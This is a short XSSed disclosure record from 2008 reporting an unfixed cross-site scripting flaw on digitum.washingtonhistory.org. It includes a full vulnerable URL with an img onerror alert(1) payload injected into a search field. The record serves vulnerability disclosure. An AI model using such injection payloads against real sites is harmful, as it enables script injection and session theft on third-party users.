Unfixed XSS vulnerability at digitum.washingtonhistory.org

2008-08-24T00:00:00
ID XSSED:48434
Type xssed
Reporter PaPPy
Modified 2008-08-31T00:00:00

Description

Security researcher PaPPy, has submitted on 24/08/2008 a cross-site-scripting (XSS) vulnerability affecting digitum.washingtonhistory.org, which at the time of submission ranked 2076400 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 31/08/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://digitum.washingtonhistory.org/cdm4/results.php?CISOOP1=all&CISOBOX1=%3Cimg%20src%3D%22%22%20onerror%3D%22alert(1)%3B%22%3E&CISOFIELD1=CISOSEARCHALL&CISOOP2=exact&CISOBOX2=&CISOFIELD2=CISOSEARCHALL&CISOOP3=any&CISOBOX3=&CISOFIELD3=CISOSEARCHALL&CISOOP4=none&CISOBOX4=&CISOFIELD4=CISOSEARCHALL&CISOROOT=all,/curtis,/genphotos,/art,/basket,/manuscripts,/indian,/columbia,/stevens,/lcexpedition,/sohon,/maps,/ephemera,/artifacts,/archaeology,/boland,/wehn,/music,/womens&t=a